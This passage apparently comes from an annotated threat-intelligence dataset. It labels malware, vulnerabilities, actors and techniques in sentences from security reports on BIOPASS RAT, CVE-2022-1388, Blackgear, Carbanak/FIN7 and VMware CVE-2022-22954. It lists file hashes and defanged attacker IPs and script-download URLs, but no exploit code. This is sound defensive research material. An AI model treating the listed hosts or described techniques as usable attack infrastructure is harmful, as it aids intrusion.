Backdoor.","entities":[{"id":10313,"label":"malware","start_offset":0,"end_offset":11},{"id":10315,"label":"malware","start_offset":120,"end_offset":131},{"id":10317,"label":"malware","start_offset":242,"end_offset":253},{"id":10314,"label":"SHA2","start_offset":46,"end_offset":110},{"id":10316,"label":"SHA2","start_offset":166,"end_offset":230},{"id":49115,"label":"FILEPATH","start_offset":112,"end_offset":118},{"id":49116,"label":"malware","start_offset":140,"end_offset":164},{"id":49117,"label":"FILEPATH","start_offset":232,"end_offset":240},{"id":49114,"label":"malware","start_offset":20,"end_offset":44}],"relations":[{"id":720,"from_id":10313,"to_id":49114,"type":"duplicate-of"},{"id":723,"from_id":10317,"to_id":49116,"type":"duplicate-of"},{"id":728,"from_id":10316,"to_id":49116,"type":"indicates"},{"id":721,"from_id":49115,"to_id":10314,"type":"duplicate-of"},{"id":722,"from_id":49117,"to_id":10316,"type":"duplicate-of"},{"id":724,"from_id":10315,"to_id":49116,"type":"duplicate-of"},{"id":725,"from_id":10314,"to_id":49114,"type":"indicates"},{"id":726,"from_id":49115,"to_id":49114,"type":"indicates"},{"id":727,"from_id":49117,"to_id":49116,"type":"indicates"}],"Comments":[]} {"id":3433,"text":"aos.exe BIOPASS RAT binary (PyInstaller) Trojan.Win32.BIOPASS.A afbfe16cbdd574d64c24ad97810b04db509505522e5bb7b9ca3b497efc731045 socketio.exe BIOPASS RAT binary (Nuitka) Trojan.Win32.BIOPASS.A 0b9f605926df4ff190ddc6c11e0f5839bffe431a3ddfd90acde1fcd2f91dada3 socketio.exe BIOPASS RAT binary (Nuitka) Trojan.Win32.BIOPASS.A 6fc307063c376b8be2d3a9545959e068884d9cf7f819b176adf676fc4addef7d flash_ins_bak.exe BIOPASS RAT binary (Nuitka) Trojan.Win32.BIOPASS.A 7249ad971283e164b0489110c23f4e40c64ee49b49bcc5cd0d32d9e701ec2114 files.zip BIOPASS RAT binary (Nuitka) Trojan.Win32.BIOPASS.A de17e583a4d112ce513efd4b7cb575d272dcceef229f81360ebdfa5a1e083f11 fn.exe BIOPASS RAT binary (Nuitka) Trojan","entities":[{"id":10324,"label":"SHA2","start_offset":67,"end_offset":131},{"id":10330,"label":"SHA2","start_offset":471,"end_offset":535},{"id":10332,"label":"SHA2","start_offset":601,"end_offset":665},{"id":10326,"label":"SHA2","start_offset":200,"end_offset":264},{"id":10328,"label":"SHA2","start_offset":333,"end_offset":397},{"id":49123,"label":"FILEPATH","start_offset":0,"end_offset":7},{"id":49129,"label":"malware","start_offset":280,"end_offset":307},{"id":49132,"label":"FILEPATH","start_offset":667,"end_offset":673},{"id":49135,"label":"malware","start_offset":147,"end_offset":174},{"id":49136,"label":"malware","start_offset":418,"end_offset":445},{"id":49124,"label":"malware","start_offset":43,"end_offset":65},{"id":49125,"label":"FILEPATH","start_offset":133,"end_offset":145},{"id":49126,"label":"malware","start_offset":176,"end_offset":198},{"id":49127,"label":"FILEPATH","start_offset":266,"end_offset":278},{"id":49128,"label":"malware","start_offset":309,"end_offset":331},{"id":49130,"label":"FILEPATH","start_offset":399,"end_offset":416},{"id":49131,"label":"FILEPATH","start_offset":537,"end_offset":546},{"id":49133,"label":"malware","start_offset":577,"end_offset":599},{"id":49134,"label":"malware","start_offset":9,"end_offset":41},{"id":49137,"label":"malware","start_offset":447,"end_offset":469},{"id":49138,"label":"malware","start_offset":548,"end_offset":575},{"id":49139,"label":"malware","start_offset":675,"end_offset":710}],"relations":[{"id":729,"from_id":49123,"to_id":49124,"type":"indicates"},{"id":730,"from_id":49134,"to_id":49124,"type":"duplicate-of"},{"id":731,"from_id":10324,"to_id":49124,"type":"indicates"},{"id":732,"from_id":49125,"to_id":49124,"type":"indicates"},{"id":733,"from_id":49135,"to_id":49126,"type":"duplicate-of"},{"id":734,"from_id":10326,"to_id":49126,"type":"indicates"},{"id":735,"from_id":49127,"to_id":49126,"type":"indicates"},{"id":736,"from_id":49127,"to_id":10326,"type":"duplicate-of"},{"id":737,"from_id":49129,"to_id":49128,"type":"duplicate-of"},{"id":738,"from_id":10328,"to_id":49128,"type":"indicates"},{"id":739,"from_id":49130,"to_id":49128,"type":"indicates"},{"id":740,"from_id":49130,"to_id":10328,"type":"duplicate-of"},{"id":741,"from_id":49136,"to_id":49137,"type":"duplicate-of"},{"id":742,"from_id":49131,"to_id":10330,"type":"duplicate-of"},{"id":743,"from_id":49131,"to_id":49137,"type":"indicates"},{"id":744,"from_id":10330,"to_id":49137,"type":"indicates"},{"id":745,"from_id":49138,"to_id":49133,"type":"duplicate-of"},{"id":746,"from_id":49139,"to_id":49133,"type":"duplicate-of"},{"id":747,"from_id":49132,"to_id":10332,"type":"duplicate-of"},{"id":748,"from_id":49132,"to_id":49133,"type":"indicates"},{"id":749,"from_id":10332,"to_id":49133,"type":"indicates"}],"Comments":[]} {"id":3436,"text":"This post is also available in: 日本語 (Japanese) On May 4, 2022, F5 released a security advisory for a remote code execution vulnerability in the iControlREST component of its BIG-IP product tracked in CVE-2022-1388.","entities":[{"id":49195,"label":"vulnerability","start_offset":206,"end_offset":219},{"id":49196,"label":"vulnerability","start_offset":107,"end_offset":142},{"id":49193,"label":"TIME","start_offset":53,"end_offset":67},{"id":49194,"label":"identity","start_offset":69,"end_offset":71},{"id":49197,"label":"tools","start_offset":150,"end_offset":162}],"relations":[{"id":750,"from_id":49196,"to_id":49195,"type":"duplicate-of"},{"id":751,"from_id":49197,"to_id":49195,"type":"has"}],"Comments":[]} {"id":3437,"text":"Threat actors can exploit this vulnerability to bypass authentication and run arbitrary code on unpatched systems.","entities":[{"id":49198,"label":"attack-pattern","start_offset":48,"end_offset":69},{"id":49200,"label":"vulnerability","start_offset":26,"end_offset":44},{"id":49199,"label":"attack-pattern","start_offset":74,"end_offset":113}],"relations":[{"id":752,"from_id":49198,"to_id":49200,"type":"targets"},{"id":753,"from_id":49199,"to_id":49200,"type":"targets"}],"Comments":[]} {"id":3439,"text":"Since the release of this advisory, mass scanning activity has started to occur, seeking unpatched systems, and in-the-wild exploitation has begun. Palo Alto Networks released a Threat Prevention signature for the F5 BIG-IP Authentication Bypass Vulnerability (92570) and within just 10 hours, the signature triggered 2,552 times due to vulnerability scanning and active exploitation attempts.","entities":[{"id":49201,"label":"identity","start_offset":149,"end_offset":168},{"id":49203,"label":"vulnerability","start_offset":225,"end_offset":268},{"id":49204,"label":"TIME","start_offset":285,"end_offset":293},{"id":49202,"label":"tools","start_offset":215,"end_offset":224}],"relations":[{"id":754,"from_id":49202,"to_id":49203,"type":"has"}],"Comments":[]} {"id":3442,"text":" Vulnerable Systems Mitigation Actions Observed in the Wild Conclusion Additional Resources Indicators of Compromise The F5 product vulnerable to CVE-2022-1388 is BIG-IP with the following versions: The vulnerability exists within the iControl REST framework used by BIG-IP.","entities":[{"id":49208,"label":"vulnerability","start_offset":201,"end_offset":218},{"id":49209,"label":"tools","start_offset":118,"end_offset":132},{"id":49207,"label":"vulnerability","start_offset":146,"end_offset":160},{"id":49210,"label":"tools","start_offset":237,"end_offset":260}],"relations":[{"id":755,"from_id":49208,"to_id":49207,"type":"duplicate-of"},{"id":756,"from_id":49209,"to_id":49207,"type":"has"},{"id":757,"from_id":49210,"to_id":49208,"type":"has"}],"Comments":[]} {"id":3443,"text":" We recommend that customers update their F5 BIG-IP deployments to one of the following versions that have patches to mitigate CVE-2022-1388:","entities":[{"id":49212,"label":"tools","start_offset":42,"end_offset":51},{"id":49211,"label":"vulnerability","start_offset":127,"end_offset":140}],"relations":[{"id":758,"from_id":49212,"to_id":49211,"type":"has"}],"Comments":[]} {"id":3448,"text":"These were found by analysis of the packet captures that triggered the F5 BIG-IP Authentication Bypass Vulnerability signature.","entities":[{"id":49220,"label":"vulnerability","start_offset":81,"end_offset":116},{"id":49221,"label":"tools","start_offset":71,"end_offset":80}],"relations":[{"id":759,"from_id":49221,"to_id":49220,"type":"has"}],"Comments":[]} {"id":3451,"text":" K23605346: BIG-IP iControl REST vulnerability CVE-2022-1388 EnemyBot Attempts to Exploit CVE-2022-1388 30f7e1998d162dfad69d6d8abb763ae4033bbd4a015d170b1ad3e20d39cd4e20 da647646cd36a3acb716b4266e9032f9c1caf555b7667e1dbe5bef89e7d2fdbb b39d2a1202351d3be5d9906ec47ee05c305302124dddec5538dc7b9924c6b85d ad6d44c70f83431bedf890967f2da0607c9b1f79591fb1b2697160f5b1c1a75c 1f93a6696f7bf1b2067cc503583deb4840404ebeeba89579bd303f57000baeb7 9a72aab2a3d1d6e66c185966597a52a8726ca25f5d9e2195af44f98d8b1847d5 53214f4d2d2dfd02b46f416cbdcb6f3a764820a50da4d59926f829b96cf82a6c 20.187.67[.]224 192.132.218[.]149 85.203.23[.]73 116.48.110[.]159 hxxps:\/\/transfer[.]sh\/dlxo3I\/1.sh hxxp:\/\/20.239.193[.]47\/kele.sh hxxp:\/\/20.239.193[.]47\/kele1 hxxp:\/\/20.187.86[.]47\/dadda Updated May 16, 2022 Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[{"id":10440,"label":"malware","start_offset":61,"end_offset":69},{"id":10442,"label":"SHA2","start_offset":170,"end_offset":234},{"id":10443,"label":"SHA2","start_offset":235,"end_offset":299},{"id":10444,"label":"SHA2","start_offset":300,"end_offset":364},{"id":10446,"label":"SHA2","start_offset":430,"end_offset":494},{"id":10447,"label":"SHA2","start_offset":495,"end_offset":559},{"id":10448,"label":"IPV4","start_offset":561,"end_offset":576},{"id":10449,"label":"IPV4","start_offset":577,"end_offset":594},{"id":10450,"label":"IPV4","start_offset":595,"end_offset":609},{"id":10451,"label":"IPV4","start_offset":610,"end_offset":626},{"id":10441,"label":"SHA2","start_offset":105,"end_offset":169},{"id":10445,"label":"SHA2","start_offset":365,"end_offset":429},{"id":49225,"label":"vulnerability","start_offset":12,"end_offset":60},{"id":49228,"label":"DOMAIN","start_offset":662,"end_offset":692},{"id":49229,"label":"DOMAIN","start_offset":693,"end_offset":721},{"id":49226,"label":"vulnerability","start_offset":90,"end_offset":103},{"id":49230,"label":"DOMAIN","start_offset":722,"end_offset":749},{"id":49231,"label":"TIME","start_offset":759,"end_offset":771},{"id":49227,"label":"DOMAIN","start_offset":628,"end_offset":661}],"relations":[{"id":760,"from_id":10440,"to_id":49226,"type":"exploits"}],"Comments":[]} {"id":3454,"text":"Blackgear (also known as Topgear and Comnie) is a cyberespionage campaign dating back to 2008, at least based on the Protux backdoor used by its operators.","entities":[{"id":49232,"label":"campaign","start_offset":0,"end_offset":9},{"id":49233,"label":"campaign","start_offset":25,"end_offset":32},{"id":49234,"label":"campaign","start_offset":37,"end_offset":43},{"id":49235,"label":"TIME","start_offset":89,"end_offset":93},{"id":49236,"label":"malware","start_offset":117,"end_offset":132}],"relations":[{"id":761,"from_id":49233,"to_id":49232,"type":"duplicate-of"},{"id":762,"from_id":49234,"to_id":49232,"type":"duplicate-of"}],"Comments":[]} {"id":3458,"text":"A notable characteristic of Blackgear is the degree to which its attacks are taken to evade detection, abusing blogging, microblogging, and social media services to hide its command-and-control (C&C) configuration.","entities":[{"id":49244,"label":"attack-pattern","start_offset":86,"end_offset":101},{"id":49247,"label":"attack-pattern","start_offset":165,"end_offset":213},{"id":49248,"label":"attack-pattern","start_offset":103,"end_offset":161},{"id":49243,"label":"threat-actor","start_offset":28,"end_offset":37}],"relations":[{"id":763,"from_id":49243,"to_id":49244,"type":"uses"},{"id":765,"from_id":49243,"to_id":49247,"type":"uses"},{"id":766,"from_id":49243,"to_id":49248,"type":"uses"}],"Comments":[]} {"id":3461,"text":"Analyzing the Marade downloader (detected by Trend Micro as TSPY_MARADE.ZTBC) and the version of Protux (BKDR_PROTUX.ZTBC) employed by Blackgear’s latest campaigns, we found their encrypted configurations on blog and social media posts (see Figure 1).","entities":[{"id":49251,"label":"malware","start_offset":14,"end_offset":31},{"id":49252,"label":"identity","start_offset":45,"end_offset":56},{"id":49254,"label":"malware","start_offset":97,"end_offset":122},{"id":49255,"label":"threat-actor","start_offset":135,"end_offset":144},{"id":49253,"label":"malware","start_offset":60,"end_offset":76}],"relations":[{"id":767,"from_id":49253,"to_id":49251,"type":"duplicate-of"},{"id":768,"from_id":49254,"to_id":49251,"type":"based-on"},{"id":769,"from_id":49251,"to_id":49255,"type":"authored-by"}],"Comments":[]} {"id":3463,"text":"Figure 1. Marade’s encrypted configuration on a Facebook post Figure 2. Infection chain of Blackgear’s attack Attack chain","entities":[{"id":49258,"label":"threat-actor","start_offset":91,"end_offset":100},{"id":49256,"label":"malware","start_offset":10,"end_offset":17},{"id":49257,"label":"SOFTWARE","start_offset":48,"end_offset":56}],"relations":[{"id":770,"from_id":49256,"to_id":49257,"type":"uses"}],"Comments":[]} {"id":3465,"text":"Here’s a summary of Blackgear’s latest campaign: Use a decoy document or fake installer file, sent via spam email to lure a potential victim into clicking it.","entities":[{"id":49260,"label":"campaign","start_offset":20,"end_offset":47},{"id":49262,"label":"attack-pattern","start_offset":104,"end_offset":114},{"id":49261,"label":"attack-pattern","start_offset":56,"end_offset":93}],"relations":[{"id":771,"from_id":49260,"to_id":49261,"type":"uses"},{"id":772,"from_id":49260,"to_id":49262,"type":"uses"}],"Comments":[]} {"id":3466,"text":"The decoy document will extract the Marade downloader.","entities":[{"id":49264,"label":"malware","start_offset":36,"end_offset":53},{"id":49265,"label":"attack-pattern","start_offset":4,"end_offset":18}],"relations":[{"id":774,"from_id":49265,"to_id":49264,"type":"delivers"}],"Comments":[]} {"id":3469,"text":"If the affected system can connect online and doesn’t have AV software, Marade will connect to a Blackgear-controlled public blog or social media post to retrieve an encrypted C&C configuration.","entities":[{"id":49269,"label":"Infrastucture","start_offset":118,"end_offset":193},{"id":49267,"label":"malware","start_offset":72,"end_offset":78},{"id":49268,"label":"threat-actor","start_offset":97,"end_offset":106}],"relations":[{"id":775,"from_id":49268,"to_id":49269,"type":"controls"},{"id":776,"from_id":49267,"to_id":49269,"type":"beacons-to"}],"Comments":[]} {"id":3474,"text":"Protux, a known backdoor, is executed by abusing the rundll32 dynamic-link library (DLL).","entities":[{"id":49273,"label":"malware","start_offset":0,"end_offset":6},{"id":49274,"label":"attack-pattern","start_offset":41,"end_offset":88}],"relations":[{"id":777,"from_id":49273,"to_id":49274,"type":"uses"}],"Comments":[]} {"id":3479,"text":"Encrypted configurations of Protux (top) and Marade (bottom) in the same blog post Correlating Marade and Protux","entities":[{"id":49281,"label":"malware","start_offset":28,"end_offset":34},{"id":49282,"label":"malware","start_offset":45,"end_offset":51},{"id":49283,"label":"malware","start_offset":95,"end_offset":101},{"id":49284,"label":"malware","start_offset":106,"end_offset":112}],"relations":[{"id":778,"from_id":49283,"to_id":49284,"type":"variant-of"}],"Comments":[]} {"id":3502,"text":"Based on the controller’s behavior, we can posit that both Marade and Protux were authored by the same threat actors.","entities":[{"id":49298,"label":"malware","start_offset":70,"end_offset":76},{"id":49297,"label":"malware","start_offset":59,"end_offset":65}],"relations":[{"id":780,"from_id":49297,"to_id":49298,"type":"variant-of"}],"Comments":[]} {"id":3528,"text":"Protux’s latest version, 3.7, uses the open-source compiler OpenCSP to generate a session key with the RSA algorithm.","entities":[{"id":10665,"label":"malware","start_offset":0,"end_offset":6},{"id":49309,"label":"tools","start_offset":60,"end_offset":67}],"relations":[{"id":781,"from_id":10665,"to_id":49309,"type":"uses"}],"Comments":[]} {"id":3530,"text":"Different versions of Protux used by Blackgear Figure 9.","entities":[{"id":49310,"label":"malware","start_offset":22,"end_offset":28},{"id":49311,"label":"threat-actor","start_offset":37,"end_offset":46}],"relations":[{"id":782,"from_id":49311,"to_id":49310,"type":"uses"}],"Comments":[]} {"id":3545,"text":"Blackgear’s campaigns also use email as an entry point, which is why it’s important to secure the email gateway.","entities":[{"id":49322,"label":"threat-actor","start_offset":0,"end_offset":9},{"id":49323,"label":"attack-pattern","start_offset":27,"end_offset":54}],"relations":[{"id":783,"from_id":49322,"to_id":49323,"type":"uses"}],"Comments":[]} {"id":3550,"text":"In November 2019, we published a blog analyzing an exploit kit we named Capesand that exploited Adobe Flash and Microsoft Internet Explorer flaws.","entities":[{"id":49331,"label":"TIME","start_offset":3,"end_offset":16},{"id":49332,"label":"malware","start_offset":72,"end_offset":80},{"id":49333,"label":"SOFTWARE","start_offset":96,"end_offset":107},{"id":49334,"label":"SOFTWARE","start_offset":112,"end_offset":139}],"relations":[{"id":784,"from_id":49332,"to_id":49333,"type":"exploits"},{"id":785,"from_id":49332,"to_id":49334,"type":"exploits"}],"Comments":[]} {"id":3555,"text":"We took a look at one of the samples captured from Capesand that was used to deploy the njRat malware – notably its main executable NotepadEx.","entities":[{"id":10758,"label":"malware","start_offset":88,"end_offset":93},{"id":49337,"label":"malware","start_offset":51,"end_offset":59}],"relations":[{"id":786,"from_id":49337,"to_id":10758,"type":"delivers"}],"Comments":[]} {"id":3558,"text":"Examining the Capesand samples The simplified diagram taken from the previous blog shows the combination of ConfuserEx and Cassandra via the second layer of obfuscation protection, which involves the DLL CyaX_Sharp Assembly (both CyaX_Sharp and CyaX are part of the Cassandra protector).","entities":[{"id":49341,"label":"malware","start_offset":14,"end_offset":22},{"id":49342,"label":"tools","start_offset":108,"end_offset":118},{"id":49343,"label":"tools","start_offset":123,"end_offset":132},{"id":49344,"label":"tools","start_offset":230,"end_offset":240},{"id":49345,"label":"tools","start_offset":245,"end_offset":249},{"id":49346,"label":"tools","start_offset":266,"end_offset":285}],"relations":[{"id":787,"from_id":49341,"to_id":49342,"type":"uses"},{"id":788,"from_id":49341,"to_id":49343,"type":"uses"}],"Comments":[]} {"id":3585,"text":"Next, let’s look for the attribute indicator, starting with the CyaX assembly used in the NotepadEx attack.","entities":[{"id":49368,"label":"campaign","start_offset":90,"end_offset":99},{"id":49367,"label":"tools","start_offset":64,"end_offset":68}],"relations":[{"id":789,"from_id":49368,"to_id":49367,"type":"uses"}],"Comments":[]} {"id":3611,"text":"Indicators of Compromise (IoCs) Indicator Attribution Trend Micro Pattern Detection 068d32a43191dc0164b600b85a1621be0154504fd477167422ff4a8fb3406d73 AnimalGames Backdoor.","entities":[{"id":10902,"label":"SHA2","start_offset":85,"end_offset":149},{"id":49391,"label":"identity","start_offset":55,"end_offset":66},{"id":49392,"label":"malware","start_offset":150,"end_offset":170}],"relations":[{"id":790,"from_id":10902,"to_id":49392,"type":"indicates"}],"Comments":[]} {"id":3617,"text":"In our new research blog “FreeMilk: A Highly Targeted Spear Phishing Campaign”, our Unit 42 research team has discovered an attack campaign that takes spear phishing targeting to the next level by hijacking in-progress email conversations.","entities":[{"id":49399,"label":"identity","start_offset":84,"end_offset":105},{"id":49400,"label":"attack-pattern","start_offset":151,"end_offset":165},{"id":49401,"label":"attack-pattern","start_offset":197,"end_offset":238},{"id":49402,"label":"campaign","start_offset":131,"end_offset":139}],"relations":[{"id":791,"from_id":49402,"to_id":49400,"type":"uses"},{"id":792,"from_id":49402,"to_id":49401,"type":"uses"}],"Comments":[]} {"id":3624,"text":" A good example of a generalized phishing campaign is the Blank Slate Campaign we wrote about in March 2017.","entities":[{"id":49409,"label":"campaign","start_offset":58,"end_offset":78},{"id":49410,"label":"TIME","start_offset":97,"end_offset":107},{"id":49408,"label":"attack-pattern","start_offset":33,"end_offset":50}],"relations":[{"id":793,"from_id":49409,"to_id":49408,"type":"uses"}],"Comments":[]} {"id":3628,"text":"For example, a spear phishing attack could use email messages about military exercises sent to military or government targets like we saw with our recent research into CMSTAR Trojan attacks.","entities":[{"id":10953,"label":"attack-pattern","start_offset":15,"end_offset":29},{"id":10954,"label":"malware","start_offset":168,"end_offset":174}],"relations":[{"id":794,"from_id":10954,"to_id":10953,"type":"uses"}],"Comments":[]} {"id":3661,"text":"MITRE also identifies different main targets for each group: While Carbanak focuses on banking institutions, FIN7 targets food, hospitality, and retail establishments.","entities":[{"id":49437,"label":"threat-actor","start_offset":67,"end_offset":75},{"id":49438,"label":"threat-actor","start_offset":109,"end_offset":113},{"id":49436,"label":"identity","start_offset":0,"end_offset":5},{"id":49439,"label":"identity","start_offset":87,"end_offset":107},{"id":49440,"label":"identity","start_offset":122,"end_offset":166}],"relations":[{"id":795,"from_id":49437,"to_id":49439,"type":"targets"},{"id":796,"from_id":49438,"to_id":49440,"type":"targets"}],"Comments":[]} {"id":3668,"text":"After this, the Carbanak backdoor can then be used to log keystrokes and capture screenshots, steal and delete cookies, inject malicious code on sites, and monitor various traffic.","entities":[{"id":49452,"label":"malware","start_offset":16,"end_offset":33},{"id":49453,"label":"attack-pattern","start_offset":54,"end_offset":68},{"id":49456,"label":"attack-pattern","start_offset":120,"end_offset":150},{"id":49457,"label":"attack-pattern","start_offset":156,"end_offset":179},{"id":49455,"label":"attack-pattern","start_offset":94,"end_offset":118},{"id":49454,"label":"attack-pattern","start_offset":73,"end_offset":92}],"relations":[{"id":797,"from_id":49452,"to_id":49453,"type":"uses"},{"id":798,"from_id":49452,"to_id":49454,"type":"uses"},{"id":799,"from_id":49452,"to_id":49455,"type":"uses"},{"id":800,"from_id":49452,"to_id":49456,"type":"uses"},{"id":801,"from_id":49452,"to_id":49457,"type":"uses"}],"Comments":[]} {"id":3670,"text":"To be more specific in terms of ATT&CK® techniques, Carbanak and FIN7 share a notable number of similarities.","entities":[{"id":49461,"label":"threat-actor","start_offset":65,"end_offset":69},{"id":49460,"label":"threat-actor","start_offset":52,"end_offset":60}],"relations":[{"id":802,"from_id":49460,"to_id":49461,"type":"related-to"}],"Comments":[]} {"id":3684,"text":"We detected a variant of the Carbanak malware that adds registry entries and keys as an autostart technique.","entities":[{"id":49477,"label":"malware","start_offset":29,"end_offset":45},{"id":49479,"label":"attack-pattern","start_offset":51,"end_offset":107}],"relations":[{"id":803,"from_id":49477,"to_id":49479,"type":"uses"}],"Comments":[]} {"id":3692,"text":"FIN7 attacks can and inject code into processes and hijack the search order used to load DLL files.","entities":[{"id":49484,"label":"threat-actor","start_offset":0,"end_offset":4},{"id":49485,"label":"attack-pattern","start_offset":21,"end_offset":32},{"id":49486,"label":"attack-pattern","start_offset":52,"end_offset":98}],"relations":[{"id":804,"from_id":49484,"to_id":49485,"type":"uses"},{"id":805,"from_id":49484,"to_id":49486,"type":"uses"}],"Comments":[]} {"id":3697,"text":"Carbanak also performs techniques for disabling security tools, deleting files that are left in malicious activity, and modifying registry to hide configuration information.","entities":[{"id":49494,"label":"attack-pattern","start_offset":120,"end_offset":138},{"id":49493,"label":"attack-pattern","start_offset":64,"end_offset":78},{"id":49491,"label":"attack-pattern","start_offset":38,"end_offset":62},{"id":49492,"label":"threat-actor","start_offset":0,"end_offset":8}],"relations":[{"id":806,"from_id":49492,"to_id":49491,"type":"uses"},{"id":807,"from_id":49492,"to_id":49493,"type":"uses"},{"id":808,"from_id":49492,"to_id":49494,"type":"uses"}],"Comments":[]} {"id":3698,"text":"FIN7 utilizes guardrails to restrict execution and abused utilities that allow indirect command execution that can go past security restrictions.","entities":[{"id":49495,"label":"attack-pattern","start_offset":79,"end_offset":105},{"id":49496,"label":"threat-actor","start_offset":0,"end_offset":4},{"id":49497,"label":"tools","start_offset":14,"end_offset":24}],"relations":[{"id":809,"from_id":49496,"to_id":49497,"type":"uses"},{"id":810,"from_id":49496,"to_id":49495,"type":"uses"}],"Comments":[]} {"id":3705,"text":"On the other hand, FIN7 performs hooking.","entities":[{"id":11240,"label":"attack-pattern","start_offset":33,"end_offset":40},{"id":49500,"label":"threat-actor","start_offset":19,"end_offset":23}],"relations":[{"id":811,"from_id":49500,"to_id":11240,"type":"uses"}],"Comments":[]} {"id":3713,"text":"In Carbanak attacks, the groups’ attacks can involve logging into services that accept remote connections and using stolen password hashes through the “pass the hash” method.","entities":[{"id":49509,"label":"attack-pattern","start_offset":152,"end_offset":165},{"id":49510,"label":"threat-actor","start_offset":3,"end_offset":11},{"id":49511,"label":"attack-pattern","start_offset":110,"end_offset":138}],"relations":[{"id":812,"from_id":49510,"to_id":49511,"type":"uses"},{"id":813,"from_id":49510,"to_id":49509,"type":"uses"}],"Comments":[]} {"id":3716,"text":"At the collection phase, Carbanak and FIN7 campaigns harvest data from local system sources and through input and screen capture (as performed in a related campaign using the Tirion malware).","entities":[{"id":49515,"label":"attack-pattern","start_offset":53,"end_offset":91},{"id":49516,"label":"attack-pattern","start_offset":114,"end_offset":128},{"id":49512,"label":"threat-actor","start_offset":25,"end_offset":33},{"id":49513,"label":"threat-actor","start_offset":38,"end_offset":42},{"id":49514,"label":"malware","start_offset":175,"end_offset":189}],"relations":[{"id":814,"from_id":49512,"to_id":49513,"type":"related-to"},{"id":815,"from_id":49512,"to_id":49515,"type":"uses"},{"id":816,"from_id":49512,"to_id":49516,"type":"uses"}],"Comments":[]} {"id":3719,"text":"In both Carbanak and FIN7 attacks, communication with users’ compromised systems is done through bypassing firewalls or network detection systems via commonly used ports, using connection proxies to avoid direct connections to the threat group’s infrastructure, employing the command-and-control channel to remotely copy files from an external system, blending in with existing network traffic by using standard application layer protocol, and taking advantage of standard cryptographic protocol to disguise command-and-control traffic.","entities":[{"id":49518,"label":"threat-actor","start_offset":8,"end_offset":16},{"id":49519,"label":"threat-actor","start_offset":21,"end_offset":25},{"id":49520,"label":"attack-pattern","start_offset":97,"end_offset":116},{"id":49521,"label":"attack-pattern","start_offset":171,"end_offset":195},{"id":49522,"label":"attack-pattern","start_offset":352,"end_offset":393}],"relations":[{"id":817,"from_id":49518,"to_id":49519,"type":"related-to"},{"id":818,"from_id":49519,"to_id":49520,"type":"uses"},{"id":819,"from_id":49519,"to_id":49521,"type":"uses"},{"id":820,"from_id":49519,"to_id":49522,"type":"uses"}],"Comments":[]} {"id":3730,"text":"On April 6, 2022, VMware published a security advisory mentioning eight vulnerabilities, including CVE-2022-22954 and CVE-2022-22960 impacting their products VMware Workspace ONE Access, Identity Manager and vRealize Automation.","entities":[{"id":49530,"label":"vulnerability","start_offset":99,"end_offset":113},{"id":49531,"label":"vulnerability","start_offset":118,"end_offset":132},{"id":49533,"label":"SOFTWARE","start_offset":187,"end_offset":203},{"id":49534,"label":"SOFTWARE","start_offset":208,"end_offset":227},{"id":49532,"label":"SOFTWARE","start_offset":158,"end_offset":185},{"id":49528,"label":"TIME","start_offset":3,"end_offset":16},{"id":49529,"label":"identity","start_offset":18,"end_offset":24}],"relations":[{"id":821,"from_id":49532,"to_id":49530,"type":"has"},{"id":822,"from_id":49532,"to_id":49531,"type":"has"},{"id":823,"from_id":49533,"to_id":49530,"type":"has"},{"id":824,"from_id":49533,"to_id":49531,"type":"has"},{"id":825,"from_id":49534,"to_id":49530,"type":"has"},{"id":826,"from_id":49534,"to_id":49531,"type":"has"}],"Comments":[]} {"id":3736,"text":"Timeline for VMware Vulnerabilities CVE-2022-22954 in the Wild Direct Downloads Mirai\/Gafgyt Dropper Scripts or Variants Webshells Perl Shellbot Base64 Injections SSH Key Targeting CVE-2022-22960 in the Wild Conclusion Indicators of Compromise","entities":[{"id":49545,"label":"vulnerability","start_offset":13,"end_offset":50},{"id":49546,"label":"malware","start_offset":80,"end_offset":85},{"id":49547,"label":"malware","start_offset":86,"end_offset":100},{"id":49548,"label":"vulnerability","start_offset":181,"end_offset":195}],"relations":[{"id":827,"from_id":49546,"to_id":49547,"type":"related-to"},{"id":828,"from_id":49546,"to_id":49545,"type":"exploits"},{"id":829,"from_id":49546,"to_id":49548,"type":"exploits"}],"Comments":[]} {"id":3748,"text":" CVE-2022-22954, a remote code execution (RCE) vulnerability due to server-side template injection in VMware Workspace ONE Access and Identity Manager, is trivial to exploit with a single HTTP request to a vulnerable device.","entities":[{"id":49573,"label":"attack-pattern","start_offset":19,"end_offset":46},{"id":49574,"label":"attack-pattern","start_offset":68,"end_offset":98},{"id":49572,"label":"vulnerability","start_offset":1,"end_offset":15},{"id":49575,"label":"SOFTWARE","start_offset":102,"end_offset":150}],"relations":[{"id":830,"from_id":49575,"to_id":49572,"type":"has"},{"id":831,"from_id":49572,"to_id":49573,"type":"uses"},{"id":832,"from_id":49572,"to_id":49574,"type":"uses"}],"Comments":[]} {"id":3750,"text":"The injected commands worth mentioning that intended to further download payloads to a vulnerable machine can be categorized into the following broad categories: We observed several instances of CVE-2022-22954 being exploited to drop variants of the Mirai malware.","entities":[{"id":49577,"label":"vulnerability","start_offset":196,"end_offset":210},{"id":49578,"label":"malware","start_offset":251,"end_offset":264}],"relations":[{"id":833,"from_id":49578,"to_id":49577,"type":"exploits"}],"Comments":[]} {"id":3752,"text":"Instead, they were either non-specific Mirai variants or contained previously known exploits such as CVE-2017-17215.","entities":[{"id":49581,"label":"malware","start_offset":39,"end_offset":44},{"id":49580,"label":"vulnerability","start_offset":101,"end_offset":115}],"relations":[{"id":834,"from_id":49581,"to_id":49580,"type":"exploits"}],"Comments":[]} {"id":3753,"text":" The exception to this is Enemybot, a currently prevalent botnet built with bits of code from both Gafgyt and Mirai source code.","entities":[{"id":49584,"label":"malware","start_offset":110,"end_offset":115},{"id":49582,"label":"malware","start_offset":26,"end_offset":34},{"id":49583,"label":"malware","start_offset":99,"end_offset":105}],"relations":[{"id":835,"from_id":49582,"to_id":49583,"type":"variant-of"},{"id":836,"from_id":49582,"to_id":49584,"type":"variant-of"}],"Comments":[]} {"id":3754,"text":"The exploits involving Enemybot eventually download Enemybot samples that themselves embed CVE-2022-22954 exploits for further exploitation and propagation.","entities":[{"id":11380,"label":"malware","start_offset":23,"end_offset":31},{"id":49586,"label":"vulnerability","start_offset":91,"end_offset":105},{"id":49585,"label":"malware","start_offset":52,"end_offset":60}],"relations":[{"id":837,"from_id":49585,"to_id":49586,"type":"exploits"},{"id":838,"from_id":11380,"to_id":49585,"type":"downloads"}],"Comments":[]} {"id":3763,"text":" CVE-2022-22960 is a privilege escalation vulnerability in VMware Workspace ONE Access, Identity Manager and vRealize Automation 